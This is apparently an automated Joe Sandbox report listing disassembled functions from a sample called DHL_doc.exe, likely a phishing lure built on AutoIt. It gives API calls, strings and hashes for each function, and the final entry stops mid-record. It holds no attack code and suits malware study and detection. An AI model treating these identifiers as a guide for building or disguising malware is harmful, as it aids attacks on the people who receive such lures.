Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DHL_doc.exe
API String ID: 2506810119-323315681
Opcode ID: c4503ee0ffc5cc262d1a70f8b4051b7c172e570fe09556ef97b5c32e758a57d3
Instruction ID: 7217ee3bc047e3e7e44e75af47ab22a99c5e0b118a24c038531d45758d90cd4d
Opcode Fuzzy Hash: c4503ee0ffc5cc262d1a70f8b4051b7c172e570fe09556ef97b5c32e758a57d3
Instruction Fuzzy Hash: 74319D71A0024CEFDB25EF999981DAEBBFCEB85350F1051ABEA04A7211D7708A40DB90

Function 00F2C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F2C306
DeleteMenu.USER32(?,00000007,00000000), ref: 00F2C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F91990,018C8B78), ref: 00F2C395

Strings

0, xrefs: 00F2C2DF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 3780e3280b3de1a6f1f8cff59fad677902e76d11e197406529d75e722016304a
Instruction ID: 047aff61d28cc7a82329194c151f713b25908ec31099467271acd3e08cdde479
Opcode Fuzzy Hash: 3780e3280b3de1a6f1f8cff59fad677902e76d11e197406529d75e722016304a
Instruction Fuzzy Hash: D8419D316053519FD720DF29EC84B5EBBE8AF85320F048A1DF9A5972D1D734AD04EB92

Function 00F54416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F5CC08,00000000,?,?,?,?), ref: 00F544AA
GetWindowLongW.USER32 ref: 00F544C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F544D7

Strings

SysTreeView32, xrefs: 00F5447C

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: f469a57122f9dcdffa13e7468890defe63a67692d1b4c3c9b549869cde3b344d
Instruction ID: 495287d34323d336af6b6b47e44c103a7c0737c7894961e44e9775753f565e31
Opcode Fuzzy Hash: f469a57122f9dcdffa13e7468890defe63a67692d1b4c3c9b549869cde3b344d
Instruction Fuzzy Hash: 6831CF31650205AFDF208E38DC45BDA7BA9EB08339F244315FE79A21D0D770EC95A750

Function 00F4304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F43077,?,?), ref: 00F43378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F4307A
_wcslen.LIBCMT ref: 00F4309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00F43106

Strings

255.255.255.255, xrefs: 00F43095, 00F4309A

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: c6ba79d9b6371d6f822006693f02231cb0ac971d4645c888cd2fc120f7542d42
Instruction ID: 05675a57972d96ff486c183441e96f8b115f01b3a5e2883c323f0f4891c80593
Opcode Fuzzy Hash: c6ba79d9b6371d6f822006693f02231cb0ac971d4645c888cd2fc120f7542d42
Instruction Fuzzy Hash: 6B31D536A04205DFDB10CF68C585EA97BE0EF54328F248159ED169B392D772DE41D760

Function 00F53EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F53F40
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F53F54
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F53F78

Strings

SysMonthCal32, xrefs: 00F53F0B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 1466004112bf2e82c3ac6fce854bc2990bf86d92bae7f7b6fc5ed7fb755b0143
Instruction ID: 7a1ca4b8e36d785f9aef072621e5755af34ae111eca4f760948733b6cc059d8e
Opcode Fuzzy Hash: 1466004112bf2e82c3ac6fce854bc2990bf86d92bae7f7b6fc5ed7fb755b0143
Instruction Fuzzy Hash: B521EC32A00219BFDF258F54CC42FEA3BB9EB48764F110214FE197B1C0C6B1A955EBA0

Function 00F54653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F54705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F54713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F5471A

Strings

msctls_updown32, xrefs: 00F54684

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 32c62cf18570f79ef69b084f2618383e09c2aa7bbb35408d82fe42fc56f26c64
Instruction ID: 8d3717a2ff332434a5fc5481931e8b6d2c45782b795b24fe88b7cc4bcb6b686e
Opcode Fuzzy Hash: 32c62cf18570f79ef69b084f2618383e09c2aa7bbb35408d82fe42fc56f26c64
Instruction Fuzzy Hash: F22160B5600209AFEB11DF64ECC1DA737EDEB4A3A9B140459FA019B251CB31FC56EB60

Function 00F295AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F2961D

Strings

#notrayicon, xrefs: 00F295B7
#OnAutoItStartRegister, xrefs: 00F295F3
#requireadmin, xrefs: 00F295D9

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 81651115756ee381f046c1fd97a711e76943dbec3886bbda01d3106db4f1fc13
Instruction ID: 9a120813ea7697457609a6ba93d621d621c8839b94cb2eaf3dd21f23682164b0
Opcode Fuzzy Hash: 81651115756ee381f046c1fd97a711e76943dbec3886bbda01d3106db4f1fc13
Instruction Fuzzy Hash: 0E218B3260813166C331AB25ED03FB777D8DF91320F04402AF989A7181EBD1DD46E2D2

Function 00F537B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F53840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F53850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F53876

Strings

Listbox, xrefs: 00F5380F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: bbd29042338cd52ac358679b226e36ab55b41e60d84351f96b4008719dcb188e
Instruction ID: 6e714c03ee8a3de8a2ee5d14d01d10dd15ea0bb9b867a69734e23ce117b6c0a4
Opcode Fuzzy Hash: bbd29042338cd52ac358679b226e36ab55b41e60d84351f96b4008719dcb188e
Instruction Fuzzy Hash: 8521C572A002187BEF219F58DC41FBB376EEF897A1F108114FA159B190C671DC56A7A0

Function 00F349F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F34A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F34A5C
SetErrorMode.KERNEL32(00000000,?,?,00F5CC08), ref: 00F34AD0

Strings

%lu, xrefs: 00F34A6F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 557096da3b7e4e0292e711bfd669c30100b13a23a0bfd1f90ff0252f84d519e8
Instruction ID: d40f6d64cace234b338d4412c4123dfb73738c740900df790dca86213a51d20e
Opcode Fuzzy Hash: 557096da3b7e4e0292e711bfd669c30100b13a23a0bfd1f90ff0252f84d519e8
Instruction Fuzzy Hash: 4C316171A00209AFDB10DF54C985EAE7BF8EF04318F144099F905EB252D775ED46DBA1

Function 00F541EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F5424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F54264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F54271

Strings

msctls_trackbar32, xrefs: 00F54226

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: aa45d4949b5dd8effda8405ca9a6b41a0049e04dfa3cd7a668470e7b61567c5f
Instruction ID: e0ca57adc52abfb98dbb54f3649d3fc056b4baa78db553fb4a143ef1b229b473
Opcode Fuzzy Hash: aa45d4949b5dd8effda8405ca9a6b41a0049e04dfa3cd7a668470e7b61567c5f
Instruction Fuzzy Hash: 1511E331640308BEEF205F29CC06FAB3BACEF85B69F110124FB55E2090D271E852AB60

Function 00F22F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

Part of subcall function 00F22DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F22DC5
Part of subcall function 00F22DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F22DD6
Part of subcall function 00F22DA7: GetCurrentThreadId.KERNEL32 ref: 00F22DDD
Part of subcall function 00F22DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F22DE4

GetFocus.USER32 ref: 00F22F78

Part of subcall function 00F22DEE: GetParent.USER32(00000000), ref: 00F22DF9

GetClassNameW.USER32(?,?,00000100), ref: 00F22FC3
EnumChildWindows.USER32(?,00F2303B), ref: 00F22FEB

Strings

%s%d, xrefs: 00F22FFF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: aee19b6d887a451fe08bcbfafc478dd3f599328716fb9b96b82ca59e0ec23952
Instruction ID: 0f5153644b4255e729f06439d0e6df40477ad1f3c3be298b3562acf849627cac
Opcode Fuzzy Hash: aee19b6d887a451fe08bcbfafc478dd3f599328716fb9b96b82ca59e0ec23952
Instruction Fuzzy Hash: 0C11E7B16002156BCF40BF709C95FEE37AAAF84308F044075F909AB252DE349A45AB70

Function 00F55882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F558C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F558EE
DrawMenuBar.USER32(?), ref: 00F558FD

Strings

0, xrefs: 00F5588F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: f8d383dca8aeb7abff9ef4857092ff744c902095ca718abdbeb7966f0d042466
Instruction ID: 7c41f8cca3a80f999d8cad3298028c05aea325625165cb591fa3e79f44983e29
Opcode Fuzzy Hash: f8d383dca8aeb7abff9ef4857092ff744c902095ca718abdbeb7966f0d042466
Instruction Fuzzy Hash: F2018431500218EFDB119F51DC44BAEBBB4FF45762F148099ED49D6261DB348A88EF61

Function 00F1D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F1D3BF
FreeLibrary.KERNEL32 ref: 00F1D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 00F1D3B9
X64, xrefs: 00F1D2A8

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 110f70653aa49478b23f2238a794beacad2f4a60850d71baeefbbabc65c2d279
Instruction ID: ec4dc05413723222bfc38ae1f59e6925e0fdc2b617d413438f60a94d63361869
Opcode Fuzzy Hash: 110f70653aa49478b23f2238a794beacad2f4a60850d71baeefbbabc65c2d279
Instruction Fuzzy Hash: AFF0E532C05B659FDB3552204CA4AE93334AF12706F558157E913F2105DB70CDC4B6D2

Function 00F2007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1453ba8baf9f07fabf369ce4959a160bab5429cbf01c4588c02504c812f1879
Instruction ID: 230ef82fc22f51207606d68f829f42e51487bc9d23f07338637251a16864b075
Opcode Fuzzy Hash: d1453ba8baf9f07fabf369ce4959a160bab5429cbf01c4588c02504c812f1879
Instruction Fuzzy Hash: 0FC16C76A0021AEFDB04CF94D894BAEB7B5FF48314F108598E505EB292CB31ED41EB90

Function 00F4342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F43459
CoUninitialize.OLE32 ref: 00F43463
VariantInit.OLEAUT32(?), ref: 00F4346E
VariantClear.OLEAUT32(?), ref: 00F4371B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 34420a3e6dd4c8a5a7c063194b9b3c078b1def232cb7f422ec8cef14c9cd7cc0
Instruction ID: f5bf9692b0f1f9511ed7014824162481270ce853b6ce19c6cdfd7043fa294eaa
Opcode Fuzzy Hash: 34420a3e6dd4c8a5a7c063194b9b3c078b1def232cb7f422ec8cef14c9cd7cc0
Instruction Fuzzy Hash: 73A107756043119FC710DF28C585E2ABBE5EF88724F05885DF98AAB362DB31EE01DB91

Function 00F20436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F5FC08,?), ref: 00F205F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F5FC08,?), ref: 00F20608
CLSIDFromProgID.OLE32(?,?,00000000,00F5CC40,000000FF,?,00000000,00000800,00000000,?,00F5FC08,?), ref: 00F2062D
_memcmp.LIBVCRUNTIME ref: 00F2064E

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 47d0f845f746b614cc5bccaf9312f53f1e44b117e3efebc4ca8ece9eeaf5bcb3
Instruction ID: 4b1ad9e67690f9c0f292cb5c7d71cf561146d801fbe534250f29e9beae761355
Opcode Fuzzy Hash: 47d0f845f746b614cc5bccaf9312f53f1e44b117e3efebc4ca8ece9eeaf5bcb3
Instruction Fuzzy Hash: 33813E72A00219EFCB04DF94C984EEEB7B9FF89315F204558F506AB251DB71AE06DB60

Function 00F01391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F014C0

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6bc26e7f68a0e5dd820c400e735d23808e3e8e5a12bca870d032c4c8fd6aab90
Instruction ID: 02687501bed54b38e1dc2b4500ccf79ae6c2489cf8e9fa6cefcd1cb6933f0a26
Opcode Fuzzy Hash: 6bc26e7f68a0e5dd820c400e735d23808e3e8e5a12bca870d032c4c8fd6aab90
Instruction Fuzzy Hash: 24414C3AA00508ABDB21EBB98C457BE3AE4FF47330F140225F619E71F2E73448417261

Function 00F56278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(018D1F60,?), ref: 00F562E2
ScreenToClient.USER32(?,?), ref: 00F56315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F56382

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: d1e5692084510a6632d9a599f75a34f59c38e9b68d431abcba6d3c5e6ce123e1
Instruction ID: b4d585b9cd1a913e3b005d2e6266e65b25cbbcd53850c0693698aca20c803540
